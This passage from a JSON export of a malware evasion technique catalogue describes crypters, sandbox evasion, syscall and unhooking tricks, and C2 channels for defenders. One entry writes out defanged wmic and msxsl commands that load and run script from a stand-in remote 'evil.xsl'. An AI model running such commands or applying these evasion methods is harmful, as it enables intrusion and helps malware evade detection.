"tags": "Constant blinding, Malware, Obfuscation, constant blinding techniques, encryption keys, code patterns, signature-based detection, recognizable patterns, exploit payloads, XORing, randomly generated key, encrypted communication,",
"modification_date": "2023-10-04T10:44:38.658000Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 343,
"key": "scrubcrypt",
"unprotect_id": "U1430",
"name": "ScrubCrypt",
"description": "ScrubCrypt is a malware obfuscation and encryption framework, derived from the earlier JLaive Batchfuscator crypter. It is designed to aid cybercriminals in evading detection and analysis by using a variety of techniques to conceal and protect the malicious software.\r\n\r\nScrubCrypt is advertised on cybercrime forums to employ encryption, code morphing, and (allegedly) polymorphism to create obfuscated malware payloads that are challenging to reverse-engineer and detection.\r\n\r\nThe Batch files generated by ScrubCrypt contain a Base64 encoded, AES-128-CBC encrypted and gzip compressed payload, which is executed / reflectively loaded.",
"resources": "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nhttps://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt\r\nhttps://twitter.com/SI_FalconTeam/status/1742527508682072179",
"creation_date": "2023-03-19T23:57:01.684000Z",
"tags": "packers, ScrubCrypt, obfuscation",
"modification_date": "2024-01-03T22:08:51.890000Z",
"category": [
12
],
"rules": [
135
],
"attachments": [],
"featured_api": [],
"contributors": [
31
]
},
{
"id": 344,
"key": "valid-accounts-default-accounts",
"unprotect_id": "T1078.001",
"name": "Valid Accounts: Default Accounts",
"description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.\r\n\r\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.",
"resources": "https://attack.mitre.org/techniques/T1078/001/",
"creation_date": "2023-03-20T23:43:16.770000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation,\r\nInitial Access,\r\nbuilt-into an OS accounts,\r\nadmin accounts,\r\nguest accounts,\r\npublicly disclosed credentials,\r\nstolen credentials,\r\nstolen private keys,\r\nremote access,",
"modification_date": "2023-10-04T10:44:49.175000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 345,
"key": "valid-accounts-domain-accounts",
"unprotect_id": "T1078.002",
"name": "Valid Accounts: Domain Accounts",
"description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\r\n\r\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.",
"resources": "https://attack.mitre.org/techniques/T1078/002/",
"creation_date": "2023-03-20T23:45:20.275000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nActive Directory Domain Services,\r\nOS Credential Dumping,\r\npassword reuse,\r\nweak passwords,\r\nprivileged domain resources,\r\nlateral movement,",
"modification_date": "2023-10-04T10:43:30.236000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 346,
"key": "valid-accounts-local-accounts",
"unprotect_id": "T1078.003",
"name": "Valid Accounts: Local Accounts",
"description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\r\n\r\nLocal Accounts may also be abused to elevate privileges and harvest credentials through OS Credential Dumping. Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.",
"resources": "https://attack.mitre.org/techniques/T1078/003/",
"creation_date": "2023-03-20T23:47:08.395000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nOS Credential Dumping,\r\nPassword reuse,\r\nweak passwords,\r\nlateral movement,",
"modification_date": "2023-10-04T10:44:50.140000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 347,
"key": "virtualizationsandbox-evasion-system-checks",
"unprotect_id": "T1497.001",
"name": "Virtualization/Sandbox Evasion: System Checks",
"description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.\r\n\r\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.\r\n\r\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.\r\n\r\nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.",
"resources": "https://attack.mitre.org/techniques/T1497/001/",
"creation_date": "2023-03-20T23:50:55.107000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME) detection,\r\nsandbox detection,\r\nVME artifacts,\r\nWindows Management Instrumentation, \r\nPowerShell, \r\nSystem Information Discovery, \r\nQuery Registry ,\r\nhost/domain name,\r\nnetwork traffic,\r\nhardware info,\r\nVMWare,\r\nvirtualisation,",
"modification_date": "2023-10-04T10:43:55.298000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 348,
"key": "virtualizationsandbox-evasion-user-activity-based-checks",
"unprotect_id": "T1497.002",
"name": "Virtualization/Sandbox Evasion: User Activity Based Checks",
"description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks, browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate",
"resources": "https://attack.mitre.org/techniques/T1497/002/",
"creation_date": "2023-03-20T23:53:34.833000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\nmonitor mouse clicks,",
"modification_date": "2023-10-04T10:43:55.889000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 349,
"key": "virtualizationsandbox-evasion-time-based-evasion",
"unprotect_id": "T1497.003",
"name": "Virtualization/Sandbox Evasion: Time Based Evasion",
"description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\r\n\r\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.\r\n\r\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments. Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).\r\n\r\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.",
"resources": "https://attack.mitre.org/techniques/T1497/003/",
"creation_date": "2023-03-20T23:56:48.796000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\ndelaying malware functionality,\r\nsleep commands,\r\nnative system scheduling functionality,\r\nevent based triggers,\r\nscheduled Multi-Stage Channels,\r\nAPI hammering,\r\ntimestamp sampling,",
"modification_date": "2023-10-04T10:43:59.645000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 350,
"key": "xsl-script-processing",
"unprotect_id": "T1220",
"name": "XSL Script Processing",
"description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. \r\n\r\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.\r\n\r\nCommand-line examples:\r\n\r\nmsxsl.exe customers[.]xml script[.]xsl\r\nmsxsl.exe script[.]xsl script[.]xsl\r\nmsxsl.exe script[.]jpeg script[.]jpeg\r\nAnother variation of this technique, dubbed \"Squiblytwo\", involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file. This technique can also execute local/remote scripts and, similar to its Regsvr32/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.\r\nCommand-line examples:\r\n\r\nLocal File: wmic process list /FORMAT:evil[.]xsl\r\nRemote File: wmic os get /FORMAT:\"https[:]//example[.]com/evil[.]xsl\"",
"resources": "https://attack.mitre.org/techniques/T1220/",
"creation_date": "2023-03-21T00:00:35.711000Z",
"tags": "Defense Evasion,\r\nbypass application control,\r\nExtensible Stylesheet Language (XSL),\r\nexecute arbitrary files,\r\nMicrosoft common line transformation utility binary (msxsl.exe),\r\nexecute malicious embedded JavaScript,\r\nXSL files,\r\nSquiblytwo,\r\nWindows Management Instrumentation,\r\n/FORMAT,",
"modification_date": "2023-10-04T10:44:30.142000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 351,
"key": "hells-gate",
"unprotect_id": "U0520",
"name": "Hell's Gate",
"description": "The Hell's Gate technique refers to a specific method used by malware authors to make their software more difficult to detect and analyze. The technique involves the use of a custom native API resolver to resolve Windows API functions at runtime dynamically.\r\n\r\nBy using Hell's Gate, malware can avoid referencing the Windows API functions directly in the Import Address Table (IAT). This makes it harder for security analysts and automated tools to identify and trace the malware's behavior. The technique essentially hides the malware's intentions by obfuscating the API calls it uses to perform its malicious activities.\r\n\r\nThe Hell's Gate malware technique is a method used by malware authors to dynamically resolve Windows API functions at runtime, making the malware more difficult to analyze and detect. It achieves this by bypassing the conventional method of statically linking API functions in the Import Address Table.",
"resources": "https://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/\nhttps://rioasmara.com/2022/03/09/hellgate-technique-on-av-bypass/",
"creation_date": "2023-04-02T03:05:42.415000Z",
"tags": "hellsgate, AV bypass, IAT, Obfuscation",
"modification_date": "2023-10-04T10:44:54.981000Z",
"category": [
2
],
"rules": [],
"attachments": [
"fbcc6ce5-437d-4b87-ab51-a753f404e104"
],
"featured_api": [],
"contributors": []
},
{
"id": 352,
"key": "evasion-using-direct-syscalls",
"unprotect_id": "U0521",
"name": "Evasion using direct Syscalls",
"description": "In the Windows operating system, conventional malware frequently utilizes strategies involving the invocation of specific functions from the kernel32.dll library, such as `VirtualAlloc`, `VirtualProtect`, and `CreateThread`. A closer inspection of the call stack reveals that the functions employed from kernel32.dll eventually trigger corresponding functions within the ntdll.dll library. This is facilitated by the ntdll.dll library, which serves as the gateway to the Windows kernel, executing this transition via system calls (syscalls). Hence, any function invoked from kernel32.dll will subsequently prompt one or more associated functions within ntdll.dll. To illustrate, the `VirtualProtect` function from kernel32.dll corresponds to the `NtProtectVirtualMemory` function in ntdll.dll.\r\n\r\nEndpoint Detection and Response (EDR) and Antivirus (AV) systems generally hook onto the ntdll.dll, but only for a handful of crucial functions often exploited by malware. These systems actively monitor potentially exploitable behavior.\r\n\r\nThis technique can also be used for sandbox evasion. Some sandboxes log only higher-level WinAPI or NT API calls, but do not monitor or hook syscalls (or sysenters). Sandboxes that are missing these events will not see these calls. To combat this technique, ensure your sandboxes are able to log/hook syscalls and kernel function calls.\r\n\r\n## Unique Aspects of This Technique\r\nThe distinctiveness of this technique lies in its ability to invoke direct syscalls using assembly without calling upon any kernel32 or ntdll functions. It also bypasses the implementation of createthread by directly jumping to a custom heap variable, altering its protection, and finally returning for a clean exit - all without the need to allocate memory, change protection, and copy the payload to the new memory location.\r\n\r\nAnother intriguing aspect is the flexibility in naming the extern functions. These functions need not necessarily be called `VirtualProtect` or `VirtualAlloc`. They can have any arbitrary name of your choice, which enhances the complexity of analysis, particularly when disassembled. For instance, it could be named `myCustomDontProtect`, or even something obscure like `rYTBbmNPTDoscUV`.\r\n\r\n## Operational Mechanism\r\nThe main function initiates by setting up markers using inline assembly and then calls an extern function to unprotect the heap variable location containing the executable payload (in this instance, 'calc'). This extern function is converted into assembly code that triggers the syscall. Subsequently, the main function conserves the registers and prompts payload execution via another extern function. This function, in turn, translates to a \"jmp\" instruction that directs execution to the heap location, executing the payload. The payload contains instructions to return via another \"jmp\" instruction. The return location is preserved in the R15 register using inline assembly in the main function. Post return to the main function, the registers are restored, and the program gracefully terminates.",
"resources": "https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a\r\nhttps://github.com/ghostpepper108/Evasion",
"creation_date": "2023-05-18T23:39:48.016000Z",
"tags": "Kernel32.dll, VirtualAlloc, VirtualProtect, CreateThread, Call stack, Ntdll.dll, Syscall, NtProtectVirtualMemory, EDRs/AVs, Hook onto ntdll.dll, Direct syscalls, Assembly, Heap variable",
"modification_date": "2024-01-14T23:57:50.362000Z",
"category": [
2
],
"rules": [
150
],
"attachments": [],
"featured_api": [
419
],
"contributors": [
11,
27,
32
]
},
{
"id": 353,
"key": "c2-via-ftps",
"unprotect_id": "U0910",
"name": "C2 via FTP(S)",
"description": "C2 via FTP is a technique that utilizes the File Transfer Protocol (FTP) to establish command and control communication between an attacker and victim systems. It involves sending commands and receiving responses within FTP sessions, effectively using FTP as a conduit for covert communication.\r\n\r\nTo implement C2 via FTP, an attacker needs control over an FTP server, and must establish a connection to a compromised system that has access to an external network. The victim’s system must be capable of initiating FTP sessions with the attacker's server. Additionally, the attacker could employ various means of obfuscation to make the traffic appear innocuous and blend in with legitimate FTP traffic.\r\n\r\nC2 via FTP can serve diverse objectives, such as remotely executing commands, managing malware, or orchestrating multistage attacks. Detecting C2 via FTP can be challenging, as FTP is a widely-used protocol for legitimate file transfers, and the malicious traffic may not raise alarms in a network’s security monitoring systems. Moreover, if FTPS (FTP Secure) is used, the data is encrypted, adding an additional layer of complexity to detection.",
"resources": "https://github.com/DarkCoderSc/SharpFtpC2",
"creation_date": "2023-06-12T08:10:43.726000Z",
"tags": "C2, FTP, FTPS, File",
"modification_date": "2023-10-04T10:44:31.505000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [
23,
25,
290,
380,
381,
383,
450,
452,
459,
485,
603,
604,
605,
606,
607,
608,
609,
610,
611,
612,
613,
614,
615,
616,
617,
618,
619
],
"contributors": [
4
]
},
{
"id": 354,
"key": "shikata-ga-nai-sgn",
"unprotect_id": "U0708",
"name": "Shikata Ga Nai (SGN)",
"description": "Shikata Ga Nai (SGN) is a data obfuscation technique that employs a polymorphic binary encoding scheme. It was initially developed by Ege Balci and gained popularity through its implementation in Metasploit Framework's msfvenom. SGN takes a binary input and generates a self-decoding obfuscated shellcode. The algorithm utilizes a XOR feedback loop for encoding and prefixes a decoding routine to the payload. Additional garbage instructions are added to enhance obfuscation and make the payload highly resistant to static heuristic analysis. The resulting blob can be executed from the first instruction, which will decode and run the original binary payload. It's important to note that the SGN-encoded shellcode requires a RWX (Read-Write-Execute) protected memory space for proper execution.",
"resources": "https://github.com/EgeBalci/sgn\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb\nhttps://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong",
"creation_date": "2023-07-03T23:47:32.505000Z",
"tags": "Shikata Ga Nai (SGN), data obfuscation, polymorphic binary encoding scheme, Ege Balci, msfvenom, self-decoding obfuscated shellcode, XOR feedback loop",
"modification_date": "2023-10-04T10:44:32.987000Z",
"category": [
7
],
"rules": [
134
],
"attachments": [],
"featured_api": [],
"contributors": [
29
]
},
{
"id": 355,
"key": "dll-unhooking",
"unprotect_id": "U0522",
"name": "DLL Unhooking",
"description": "Endpoint Detection and Response (EDR) tools use a technique known as hooking to monitor sensitive system functions within the DLLs of loaded processes. Hooking is a method of live-patching system DLLs, enabling EDRs to intercept the flow of a program and evaluate its legitimacy.\r\n\r\nHere's how it works: EDRs modify the first instructions of the functions within the DLLs. When these functions are called, the program's execution flow is diverted to the EDR's code (housed within a DLL loaded by the EDR in the program). In this redirected state, the EDR can inspect the function's arguments to determine whether their usage is legitimate or potentially malicious. If the usage is deemed legitimate, the EDR restores the program's execution flow, allowing the function to proceed as normal.\r\n\r\nHowever, to evade detection by an EDR, malware can employ a method known as \"unhooking.\" This process involves restoring the entire DLL code section (.text) to its original state. To accomplish this, malware needs access to an unmodified (unhooked) DLL, which it can acquire in several ways: \r\n\r\n1 - directly from the system, which can potentially be detected via an open handle; \r\n\r\n2 - by opening a remote file, which requires the malware author to host a DLL matching the OS version of the target system remotely;\r\n\r\n3 - by initiating a suspended process and retrieving the content of its DLL before it gets hooked.\r\n\r\nTypically, the DLL most commonly hooked/unhooked is NTDLL.dll, as it is the closest to the kernel. However, some EDRs may also hook APIs contained in higher-level DLLs, such as kernel32.dll or user32.dll.",
"resources": "https://github.com/optiv/Freeze\nhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++",
"creation_date": "2023-07-03T23:56:46.302000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:56.825000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
29
]
},
{
"id": 356,
"key": "right-to-left-override-rlo-extension-spoofing",
"unprotect_id": "U1010",
"name": "Right-to-Left Override (RLO) Extension Spoofing",
"description": "The **Right-to-Left Override** (RLO) character (`U+202E`) is a Unicode control character used for bidirectional text formatting. It affects the way text is displayed, causing text following the RLO character to be rendered from right to left, which is typically used in languages like Arabic and Hebrew.\r\n\r\nHowever, malicious actors have found a way to exploit this Unicode character to deceive users by using it in file extensions. By strategically placing the RLO character within a file name, they can manipulate the visual appearance of the extension while maintaining its actual content.\r\n\r\nFor example, consider a file named \"invoice.pdf\" with the RLO character followed by malicious code: `invoice\\u202Efdp.exe`. When displayed in certain contexts, it may appear as `invoiceexe.pdf` (hiding the \".exe\" extension) instead of the actual \"invoice.pdf.exe\". This tactic aims to trick users into believing the file is harmless when, in reality, it could be a dangerous executable.",
"resources": "",
"creation_date": "2023-08-03T06:17:48.602000Z",
"tags": "Extension, Spoof, RLO, Filename",
"modification_date": "2024-01-15T00:01:09.968000Z",
"category": [
14
],
"rules": [
151
],
"attachments": [],
"featured_api": [],
"contributors": [
4,
32
]
},
{
"id": 357,
"key": "smb-named-pipes",
"unprotect_id": "U9011",
"name": "SMB / Named Pipes",
"description": "Named Pipes are a feature of the Windows operating system that allow for inter-process communication (IPC) using a pipe metaphor. These are particularly useful in networking scenarios as they can be made accessible over a network and facilitate a client-server model of communication. The SMB (Server Message Block) protocol is commonly used in Windows environments for shared access to files, printers, and other network services.\r\n\r\nWhen malware uses Named Pipes over the SMB protocol for network evasion, it is essentially wrapping its communication in layers of legitimate-looking traffic. Named Pipes can be set up to pass data packets that may appear harmless or even normal to network monitoring tools. This makes detection harder because the malicious traffic is mixed with regular, authorized network activity.",
"resources": "https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes?WT_mc_id=SEC-MVP-5005282\nhttps://learn.microsoft.com/en-us/dotnet/standard/io/pipe-operations?WT_mc_id=SEC-MVP-5005282\nhttps://github.com/DarkCoderSc/SharpShellPipe",
"creation_date": "2023-08-27T16:55:16.842000Z",
"tags": "Named Pipes, SMB, Network, Pivot, Evasion",
"modification_date": "2023-10-04T10:44:36.278000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [
23,
380,
450,
620,
621,
622,
623,
624
],
"contributors": [
4
]
},
{
"id": 358,
"key": "process-argument-spoofing",
"unprotect_id": "U1243",
"name": "Process Argument Spoofing",
"description": "Process Argument Spoofing is a technique used by attackers to hide their true intentions by changing the command line arguments of a process after it has started. This is done by tampering with the Process Environment Block (PEB).\r\n\r\nThe PEB is a structure in Windows that holds various information about a running process. Within the PEB, there's a specific section called `RTL_USER_PROCESS_PARAMETERS`. This section contains an attribute named CommandLine, which is structured as a `UNICODE_STRING`. The CommandLine attribute is crucial because it stores the command line arguments that were used to start the process.\r\n\r\nAttackers exploit this by modifying the CommandLine attribute's buffer. When they change the contents of this buffer, the command line arguments that are visible to monitoring tools and security analysts are altered. This means that even if a process was started with malicious intentions, the attackers can overwrite these initial arguments with harmless-looking ones. As a result, the process can appear legitimate to security systems and analysts, and potentially hiding the malicious activity.\r\n\r\nThe sophistication of Process Argument Spoofing lies in its ability to alter process information after the process has been created and initially inspected by security tools, making it a bit more challenging to detect.",
"resources": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/\r\nhttps://www.bordergate.co.uk/argument-spoofing/",
"creation_date": "2023-12-12T05:13:02.378000Z",
"tags": "Process Argument Spoofing, PEB Manipulation, Command Line Argument Tampering, Low-Level System Manipulation,",
"modification_date": "2023-12-13T06:09:46.828000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
6,
357,
625
],
"contributors": [
30
]
},
{
"id": 359,
"key": "funcin",
"unprotect_id": "U0132,U0221,U0308",
"name": "FuncIn",
"description": "FuncIn involves a payload staging strategy wherein the entire set of malicious functionalities is not contained within the malware file itself or any third-party file/network location (e.g., a web server). Instead, these functionalities are transmitted over the network by the Command and Control (C2) server when required.\r\n\r\nThis approach addresses three primary issues in malware development. Firstly, it mitigates the size of the malware, as most functionalities are not directly embedded in the malware. Functioning as a network loader, the malware can be very compact (often just a few kilobytes). Secondly, it tackles the challenges posed by malware analysis and detection. The absence of most malicious functionalities physically within the malware or its immediate dependencies can make reverse engineering and detection more challenging. For instance, if the malware loader expects specific characteristics to be met before transmitting the rest of the payload (e.g., geographic location, system requirements, certain user or host machine behaviour, and properties), analysis becomes difficult until the complete payload is downloaded. Lastly, it addresses maintenance concerns. The majority of the code residing on the C2 side makes maintenance more convenient. Malicious actors do not need to update the remote loader but only the shellcodes (functionalities) located on the C2, transmitted when needed. \r\n\r\nOne notable example of malware leveraging the FuncIn technique is PoisonIvy RAT, a famous Remote Access Trojan. Despite its compact size, typically less than 8 kilobytes, PoisonIvy RAT incorporated a wide range of expected functions for a RAT, including webcam capture, screen capture, password enumeration, system management, and file management etc..\r\n\r\nThe author of PoisonIvy RAT employed an approach of using precompiled pieces of code (shellcodes). However, with the advent of more modern tools, it is now easily feasible to compile the shellcodes just in time (JIT) before sending them to the loader. This JIT compilation enhances the adaptability and sophistication of the malware, allowing it to dynamically adjust its functionalities based on specific criteria.\r\n\r\nUnlike classic PIC , shellcodes commonly used in binary exploitation, FuncIn doesn't rely on library loading or API hashing mechanisms (at least, it don’t need to, except for additional evasion mechanisms) directly within the shellcode. Instead, these tasks are delegated to the loader, which then transmits essential information to the Command and Control (C2) server for shellcode JIT compilation or patching.\r\n\r\nAnother alternative to the FuncIn technique is loading malware functionalities through extra DLL files that are reflected to avoid being written to disk, minimising physical evidence. This approach relies on DLLs rather than shellcode, offering several advantages. In addition to supporting any high-level programming language for coding extra features, using DLLs makes it easier to maintain and extend the malware's capabilities.\r\n\r\nHowever, it's important to note that while relying on DLLs provides advantages in terms of ease of maintenance, extensibility, and language support, it may be less optimised and stealthy compared to the approach of utilising small, fully controlled pieces of code that the malware author has mastered. The choice between these techniques often involves trade-offs, considering factors such as the specific goals of the malware, the targeted systems, and the overall strategy of the threat actor.\r\n\r\nAttached to this description, you will discover a comprehensive project showcasing the FuncIn Evasion Technique, implemented with the assistance of the [Keystone Engine](https://www.keystone-engine.org). This project is designed to expand, incorporating additional examples in various programming languages. Given that the majority of the functionality resides in the shellcode, the choice of programming language for the loader is not highly restrictive. It's essential to note that the loader is typically compact and straightforward, tasked with loading and executing pieces of code within its process space.",
"resources": "https://github.com/Unprotect-Project/FuncInEvasionTechniqueDemo/tree/main",
"creation_date": "2023-12-13T16:08:17.059000Z",
"tags": "Shellcode, FuncIn, Plugins, Reflection, DLL, JIT",
"modification_date": "2023-12-13T16:37:18.308000Z",
"category": [
2,
3,
5,
8
],
"rules": [],
"attachments": [],
"featured_api": [
2,
3,
4,
5
],
"contributors": [
4
]
},
{
"id": 360,
"key": "easycrypter",
"unprotect_id": "U1431",
"name": "EasyCrypter",
"description": "EasyCrypter is the crypter that is being sold via an automated bot on Telegram. The crypter uses a method known as \"mutation\", which involves replacing instructions in the file with their analogues or a sequence of instructions that yield the same outcome as the original code. EasyCrypter supports a maximum file size of 5MB and is only applicable for x86 .NET/Native files.",
"resources": "https://teletype.in/@dinerosell/EasyCrypterFAQ_RU",
"creation_date": "2024-01-05T22:18:00.904000Z",
"tags": "packers, easycrypter",
"modification_date": "2024-01-05T22:18:00.904000Z",
"category": [
12
],
"rules": [
139
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 361,
"key": "truecrypt",
"unprotect_id": "U1432",
"name": "TrueCrypt",
"description": "TrueCrypt, a crypter developed and sold by the developers behind Meduza Stealer, which features LoadPE functionality and is written in Golang, supports both native (x32) and .NET binaries. This crypter has been used by Lumma, Vidar, Raccoon, MetaStealer, Redline stealers, and DCRAT.",
"resources": "https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web",
"creation_date": "2024-01-07T03:34:48.764000Z",
"tags": "truecrypt, packer",
"modification_date": "2024-01-07T03:34:48.764000Z",
"category": [
12
],
"rules": [
141
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 362,
"key": "purecrypter",
"unprotect_id": "U1433",
"name": "PureCrypter",
"description": "PureCrypter, a multi-functional crypter/loader developed in C#, was first introduced in hacking forums on March 17, 2021. This tool is compatible with both 32-bit and 64-bit native as well as .NET payloads. It features multiple injection modes, including reflection, RunPE, and shellcode. PureCrypter can deliver payloads either via a URL or offline. It has been noted for its use in conjunction with various RATs and infostealers, such as Remcos, AsyncRAT, Redline Stealer, and Arkei.",
"resources": "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
"creation_date": "2024-01-09T23:56:58.234000Z",
"tags": "PureCrypter, Packer",
"modification_date": "2024-01-09T23:56:58.234000Z",
"category": [
12
],
"rules": [
143
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 363,
"key": "powershell-special-characters-obfuscation",
"unprotect_id": "U0709",
"name": "PowerShell Special Characters Obfuscation",
"description": "PowerShell scripts can be obfuscated using methods that encode commands exclusively with special characters. This technique aims to complicate analysis and potentially evade detection mechanisms. \r\n\r\nAttackers frequently employ these tactics to hide the true functionalities of the script, making the analysis more challenging.",
"resources": "https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-EncodedSpecialCharOnlyCommand.ps1\r\nhttps://perl-users.jp/articles/advent-calendar/2010/sym/11",
"creation_date": "2024-01-12T10:26:52.204000Z",
"tags": "PowerShell, obfuscation",
"modification_date": "2024-01-12T10:31:41.654000Z",
"category": [
7
],
"rules": [
147
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 364,
"key": "niximports",
"unprotect_id": "U1434",
"name": "NixImports",
